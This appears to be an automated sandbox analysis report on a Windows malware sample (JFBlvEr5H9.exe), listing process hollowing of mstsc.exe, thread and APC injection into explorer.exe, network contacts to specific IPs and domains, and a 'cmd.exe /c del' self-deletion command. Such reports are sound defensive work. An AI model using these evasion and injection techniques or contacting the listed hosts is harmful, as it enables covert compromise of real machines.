Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE3B7A mov eax, dword ptr fs:[00000030h]	21_2_04AE3B7A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04AE3B7A mov eax, dword ptr fs:[00000030h]	21_2_04AE3B7A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04B88B58 mov eax, dword ptr fs:[00000030h]	21_2_04B88B58
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ABDB40 mov eax, dword ptr fs:[00000030h]	21_2_04ABDB40
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ACEF40 mov eax, dword ptr fs:[00000030h]	21_2_04ACEF40
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 21_2_04ABF358 mov eax, dword ptr fs:[00000030h]	21_2_04ABF358

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 52.20.84.62 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.pyithuhluttaw.net
Source: C:\Windows\explorer.exe	Domain query: www.aideliveryrobot.com
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.anewdistraction.com
Source: C:\Windows\explorer.exe	Network Connect: 103.91.67.83 80	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Thread register set: target process: 3472	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe

Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 1330000

Jump to behavior

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process created: C:\Users\user\Desktop\JFBlvEr5H9.exe C:\Users\user\Desktop\JFBlvEr5H9.exe	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JFBlvEr5H9.exe'	Jump to behavior

Source: explorer.exe, 00000006.00000000.283745043.0000000005EA0000.00000004.00000001.sdmp, mstsc.exe, 00000015.00000002.506046418.0000000003680000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.264132093.0000000001640000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.506046418.0000000003680000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.264132093.0000000001640000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.506046418.0000000003680000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000006.00000000.263638747.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000006.00000000.264132093.0000000001640000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.506046418.0000000003680000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000006.00000000.264132093.0000000001640000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.506046418.0000000003680000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Users\user\Desktop\JFBlvEr5H9.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\JFBlvEr5H9.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
